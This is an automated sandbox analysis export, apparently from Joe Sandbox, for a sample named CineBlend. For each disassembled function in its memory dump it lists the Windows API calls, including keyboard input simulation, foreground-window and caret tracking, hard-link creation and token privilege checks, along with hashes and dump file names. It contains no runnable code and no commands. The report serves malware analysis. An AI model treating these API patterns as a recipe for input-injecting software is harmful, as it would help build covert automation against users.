Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: c8547d81e549d42b766ea6dcc5f537a55d24218dabe90c23fc1264a9cfae3465
Instruction ID: 2c016a10254c5cf00f0d1af79b06fbec673bea26b33659a37ae1f220b3ff806f
Opcode Fuzzy Hash: c8547d81e549d42b766ea6dcc5f537a55d24218dabe90c23fc1264a9cfae3465
Instruction Fuzzy Hash: A651FE74A01209EFCF14DF68D880AAEBBF6FB55360F1085AAF95597390E730AD51CB50

Function 00B7B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 437827aba2a23e698a8dc882e8e52afb2f42e682f204b469919c7fc0a1eae880
Instruction ID: 66ba87f01e677a9c80665de99f62d7cd051c3007ec13002d8dd628f73bb2dbcb
Opcode Fuzzy Hash: 437827aba2a23e698a8dc882e8e52afb2f42e682f204b469919c7fc0a1eae880
Instruction Fuzzy Hash: 9541DB72A00704AFD725AF78CC41F6ABBEDEB84710F10C5AEF165DB291D77199018B91

Function 00BB611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BB61C8
GetLastError.KERNEL32(?,00000000), ref: 00BB61EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BB6213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BB623F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 538fd83171dee74fa24a92aaf0e6e938d67455975a013ee6b27f18f375312cba
Instruction ID: e25f4252aed9593d75dc05c0849c2973677a69d21070a18db5629a1e3fd101b8
Opcode Fuzzy Hash: 538fd83171dee74fa24a92aaf0e6e938d67455975a013ee6b27f18f375312cba
Instruction Fuzzy Hash: DD413A39600610DFCB11EF15C585A6EBBE2FF89710B1984C8E85AAB362CB74FD01DB91

Function 00B7DC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00B670E1,00000000,00000000,00B68649,?,00B68649,?,00000001,00B670E1,8BE85006,00000001,00B68649,00B68649), ref: 00B7DC90
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B7DD19
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B7DD2B
__freea.LIBCMT ref: 00B7DD34

Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c10a865f23497597deb3eb2889c1403fd95763aa148b080970f7963088582483
Instruction ID: 7567bd4ccbe3843b293855188e42e1051b7b9b1f1476e51e5015d235968c69db
Opcode Fuzzy Hash: c10a865f23497597deb3eb2889c1403fd95763aa148b080970f7963088582483
Instruction Fuzzy Hash: 3031DE32A0020AABDF259F64CC85EAE7BF5EF40750B0481A8FC29D7250EB35CD50CBA0

Function 00BAB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00BAB473
SetKeyboardState.USER32(00000080), ref: 00BAB48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00BAB4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00BAB54F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad7f811301f432ce9c488d68adab4340446d3c5538b4caf5894a8eeedda4b12b
Instruction ID: 046c8cc686a79b444e1b198dd3821f18a38ce5588829d7de3343a4607ffa4520
Opcode Fuzzy Hash: ad7f811301f432ce9c488d68adab4340446d3c5538b4caf5894a8eeedda4b12b
Instruction Fuzzy Hash: 10315B70E482086EFF308B249855FFE7BF5EF5B310F04429AE4A5562D3CB7589458761

Function 00BD5D5F Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00BD5DF0
GetWindowLongW.USER32(?,000000F0), ref: 00BD5E13
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BD5E20
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD5E46

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: d91c908550e8d9f93858f412479ef07fcfb400ec7fb14aee35b0bcd3f0455375
Instruction ID: 823b729b7b727773c0d7b8ef3444b260c3972c8a3661d17648e8eba181d0b60c
Opcode Fuzzy Hash: d91c908550e8d9f93858f412479ef07fcfb400ec7fb14aee35b0bcd3f0455375
Instruction Fuzzy Hash: 2231C438A52A08AFEB34AF14CC49FE8B7E6EB05350F584197F611973E1E730AA80D751

Function 00BAB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00BAB5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 00BAB5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 00BAB63B
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00BAB68D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1b4521d7cfc145fd4aa46b1d34bebd58f109b081bf7a85e987421fa69475057a
Instruction ID: 96531a4d5d22f765501106e01a295fd2dfdf7351ba057d31c1857694f363e423
Opcode Fuzzy Hash: 1b4521d7cfc145fd4aa46b1d34bebd58f109b081bf7a85e987421fa69475057a
Instruction Fuzzy Hash: 1D312A309486086EFF248B688815FFAFBE6FB96310F0442AAE4A1521D2D77489458BA1

Function 00BD80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00BD80D4
GetWindowRect.USER32(?,?), ref: 00BD814A
PtInRect.USER32(?,?,?), ref: 00BD815A
MessageBeep.USER32(00000000), ref: 00BD81C6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b4cb8eccf9565ef9598777210112c6b696141d37fd497ea05719faa81c0c6755
Instruction ID: 9a0db1a7608b0c0fa3d88e1dc9953f21073374a85faa5d9f2a88e286d6bf9df0
Opcode Fuzzy Hash: b4cb8eccf9565ef9598777210112c6b696141d37fd497ea05719faa81c0c6755
Instruction Fuzzy Hash: 55418B34A01215DFCB11DF58C880BA9F7F5FB4D315F1480AAE954AB361EB30A84ACB80

Function 00BD2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00BD2187

Part of subcall function 00BA4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA43AD
Part of subcall function 00BA4393: GetCurrentThreadId.KERNEL32 ref: 00BA43B4
Part of subcall function 00BA4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BA2F00), ref: 00BA43BB

GetCaretPos.USER32(?), ref: 00BD219B
ClientToScreen.USER32(00000000,?), ref: 00BD21E8
GetForegroundWindow.USER32 ref: 00BD21EE

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 20b23b3a59fde7c7e09a42a3c3c838735341c4c83bcfdecc4155a3242a13fc80
Instruction ID: d4ae7aaa37e5d950a52fbe58219a947c055599c1060373046213089c6d5fa522
Opcode Fuzzy Hash: 20b23b3a59fde7c7e09a42a3c3c838735341c4c83bcfdecc4155a3242a13fc80
Instruction Fuzzy Hash: 40313071D01109AFCB04EFA9C8818AEB7FCEF58304B5084AAE455E7311EB71DE45CBA0

Function 00BAE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF

_wcslen.LIBCMT ref: 00BAE8E2
_wcslen.LIBCMT ref: 00BAE8F9
_wcslen.LIBCMT ref: 00BAE924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00BAE92F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: 2da8c310f87f2535dea953496c8e08049616be7963e426bc90e0b3500a4e9d88
Instruction ID: b107e1c739554e22a61133a57fd97b175194aced0f217800eaf7d51f9bf7b998
Opcode Fuzzy Hash: 2da8c310f87f2535dea953496c8e08049616be7963e426bc90e0b3500a4e9d88
Instruction Fuzzy Hash: 8921A171D01219AFCB10AFA8D982BAEB7F8EF46350F1440A5E914BB241D774DE41CBA1

Function 00BD9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0

GetCursorPos.USER32(?), ref: 00BD9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BD9A72
GetCursorPos.USER32(?), ref: 00BD9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00BD9AF0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 057bd7c275cd35b060bba3def8e14a6c28fb31450426e5c008d01867b9b8386d
Instruction ID: 0e0d293c5534390b992c2ac070b44e38437afdb6e8d426a4d7cad7e76a33252f
Opcode Fuzzy Hash: 057bd7c275cd35b060bba3def8e14a6c28fb31450426e5c008d01867b9b8386d
Instruction Fuzzy Hash: 7A21D336601018EFCF159F58C898EFEBBF5FB0A710F404196F9098B261E7309950EB50

Function 00BADB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00BDDC30), ref: 00BADBA6
GetLastError.KERNEL32 ref: 00BADBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 00BADBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDDC30), ref: 00BADC21

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 8d8ec9aae90df53fc1720da551455f83fd322624660611417b9b286e9ed3f22f
Instruction ID: df2955a3386ce6be3d59d18649f00b1c575093c25480dac4d30a08ae692271dd
Opcode Fuzzy Hash: 8d8ec9aae90df53fc1720da551455f83fd322624660611417b9b286e9ed3f22f
Instruction Fuzzy Hash: B021A67054D6019F8310DF28C88496BB7E8EF56364F504A99F4DAC32A1EB30D946DB52

Function 00BA1EBD Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA1960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA1976
Part of subcall function 00BA1960: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1982
Part of subcall function 00BA1960: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1991
Part of subcall function 00BA1960: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA1998
Part of subcall function 00BA1960: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA19AE

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA1F0A
_memcmp.LIBVCRUNTIME ref: 00BA1F2D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA1F63
HeapFree.KERNEL32(00000000), ref: 00BA1F6A

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 7fe65c6439fdceda2c16b7378e6c7506efdcb6ee35600ffc4ddc0059a1a20abc
Instruction ID: 4fdadbdd68608dc35fa7329f1103ac32d4b711a0fbe4373ec2b6389e8f1ab002
Opcode Fuzzy Hash: 7fe65c6439fdceda2c16b7378e6c7506efdcb6ee35600ffc4ddc0059a1a20abc
Instruction Fuzzy Hash: F121B071E05109EFDB00DFA8C955BEEB7F8EF45355F044499E455AB240E731AE05CBA0

Function 00BD321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00BD32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BD32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BD32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BD32DC

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c10d9bf441a739b7a3bc3a8d53d3286a867ea547b089e39d43a795df36772379
Instruction ID: c4399de5d11b0428dd4d063e776b38697ab1d88df63f8c19b8ebfe5f0c3bf658
Opcode Fuzzy Hash: c10d9bf441a739b7a3bc3a8d53d3286a867ea547b089e39d43a795df36772379
Instruction Fuzzy Hash: 4921E031605111AFD7049B24C855F6AFBE5EF81724F28829AF8268B3D2DB71EE41CBD1

Function 00BA825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?), ref: 00BA96F3
Part of subcall function 00BA96E4: lstrcpyW.KERNEL32(00000000,?,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA9719
Part of subcall function 00BA96E4: lstrcmpiW.KERNEL32(00000000,?,00BA8271,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?), ref: 00BA974A

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA828A
lstrcpyW.KERNEL32(00000000,?,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA82B0
lstrcmpiW.KERNEL32(00000002,cdecl,?,00BA90BB,00000000,?,0000001C,?,?,00000000), ref: 00BA82EB

Strings

cdecl, xrefs: 00BA82E2

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: b9d75fb83fe7b8f1cf2922a940a376b2d8c7296a8bd7e078e2da1ce89983f50a
Instruction ID: 52517f5d4154e40b4e6a07152247d502905abdf4b110348b3c298d1ed8d91aba
Opcode Fuzzy Hash: b9d75fb83fe7b8f1cf2922a940a376b2d8c7296a8bd7e078e2da1ce89983f50a
Instruction Fuzzy Hash: DC11087A204342AFCF15AF38D845E7A77E9FF46750B50416AF942C7290EF319811D794

Function 00BD60FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00BD615A
_wcslen.LIBCMT ref: 00BD616C
_wcslen.LIBCMT ref: 00BD6177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD62B5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: b25abefe79cb678eae7dc5e26dcd46f4b9a924ce4533732ef7855bc6826a9235
Instruction ID: 7867eac9e2ea1bae8071711b4154a055b68610981007767c4ac58e5db097203d
Opcode Fuzzy Hash: b25abefe79cb678eae7dc5e26dcd46f4b9a924ce4533732ef7855bc6826a9235
Instruction Fuzzy Hash: 3C119375500618A6EB20DFA88CC4AEFB7FCEB15364F1041ABF915E6282FB74C944CB60

Function 00B72079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85176095b55e87ee0a8e2a02277b9bd8ed5db3352c438f531d9dd16dc045e794
Instruction ID: 1601ad74507fbdd665432d4e7dd2d858d880d456e04312b28ca675ca652be88a
Opcode Fuzzy Hash: 85176095b55e87ee0a8e2a02277b9bd8ed5db3352c438f531d9dd16dc045e794
Instruction Fuzzy Hash: 84018FB26052167EE62127786CC1F67678DDF413B8B3483A5F539A21D1EE608C408170

Function 00BA2374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00BA2394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA23D7

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend
